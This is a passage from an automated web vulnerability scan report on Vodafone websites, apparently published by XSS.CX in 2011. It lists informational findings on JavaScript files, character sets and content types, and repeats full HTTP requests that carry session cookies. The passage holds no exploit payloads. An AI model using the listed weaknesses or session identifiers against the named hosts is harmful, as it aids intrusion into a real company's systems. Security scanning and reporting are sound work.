Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1382
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

// insertAdjacentHTML(), insertAdjacentText() and insertAdjacentElement()
// for Netscape 6/Mozilla by Thor Larholm me@jscript.dk
// Usage: include this code segment at the beginning of your documen
...[SNIP]...

11.48. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchinpututil.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/searchinpututil.js

Request

GET /system/web/view/selfservice/templates/vodafone/searchinpututil.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 36618
Content-Type: application/octet-stream
Last-Modified: Wed, 25 Aug 2010 17:23:33 GMT
Accept-Ranges: bytes
ETag: "21626e3e7a44cb1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

/*
This file conatins the support functions for the searchresultappearance
template.
*/
/**
* Store the topic list in JS array, and use it for
* re-populating the subtopic dropdown, based
...[SNIP]...

11.49. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js

Request

GET /system/web/view/selfservice/templates/vodafone/searchresultsappearance.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 3920
Content-Type: application/octet-stream
Last-Modified: Wed, 25 Aug 2010 17:13:38 GMT
Accept-Ranges: bytes
ETag: "e6ea11dc7844cb1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

/*
This file conatins the support functions for the searchresultsappearance
template.
*/
function onBeforeUnload()
{
/*Unload caused because of click in the nonclient area of the window */
...[SNIP]...

11.50. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/sidelinks.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/sidelinks.js

Request

GET /system/web/view/selfservice/templates/vodafone/sidelinks.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 116
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:20 GMT
Accept-Ranges: bytes
ETag: "0c62b3e5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

function submitSideLinks(cmdName)
{
document.sidelinks1.CMD.value = cmdName;
document.sidelinks1.submit();
}

11.51. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/templateutils.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/templateutils.js

Request

GET /system/web/view/selfservice/templates/vodafone/templateutils.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 7847
Content-Type: application/octet-stream
Last-Modified: Fri, 19 Aug 2011 01:12:58 GMT
Accept-Ranges: bytes
ETag: "b2d52022d5ecc1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

/**
* Javascript functions used in all the templates
*/
// SROSBURG: Firefox not picking up the following variables from util.js,
// so redefine here
var IDENTIFIER_START = "\\{";
va
...[SNIP]...

11.52. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js

Request

GET /system/web/view/selfservice/templates/vodafone/usefulitemsutil.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

11.53. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js

Request

GET /system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 3926
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:20 GMT
Accept-Ranges: bytes
ETag: "0c62b3e5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

function ret()
{
alert('Boolean Expression is not Valid.');
document.searchForm.boolExp.value = "";
}

function isValidBooleanExpression(str)
{
var isSpace = 0;
var newStr = "";
va
...[SNIP]...

11.54. https://help.vodafone.co.uk/system/web/widget/platform/util/util.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/widget/platform/util/util.js

Request

GET /system/web/widget/platform/util/util.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 20866
Content-Type: application/octet-stream
Last-Modified: Wed, 16 Nov 2011 02:11:46 GMT
Accept-Ranges: bytes
ETag: "f1f6c175a4cc1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:23 GMT

var EGPL_USE_SUN_PLUGIN = false;
var EGPL_CLASSID = "clsid:CAFEEFAC-0016-0000-0000-ABCDEFFEDCBA";
var EGPL_CODEBASE = getWidgetDir('util') + "../../../../lib/ext/jdk_plugin/jinstall-6-windows-i586.c
...[SNIP]...

12. HTML uses unrecognised charset previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://troubleshootinghelp.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF8
utf-8

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

Response

13. Content type incorrectly stated previous
There are 2 instances of this issue:

http://enterprise.vodafone.com/images/favicon.ico
https://freesim.vodafone.co.uk/favicon.ico

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

13.1. http://enterprise.vodafone.com/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://enterprise.vodafone.com
Path:	/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_p7=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmb=112384592; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_nr=1321640828795; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dhome%25253Aindex%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%252525E2%25252580%25252593the-first-st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:15 GMT
Server: Apache
ETag: "8nJwjS9D5SG"
Last-Modified: Mon, 22 Nov 2010 17:28:10 GMT
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ................................................'...d...........m...8.......................................................................4......................
...[SNIP]...

13.2. https://freesim.vodafone.co.uk/favicon.ico previous

Summary

Severity:	Information
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

Report generated by XSS.CX at Sat Nov 19 05:58:14 CST 2011.

XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, vodafone.com

Contents

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response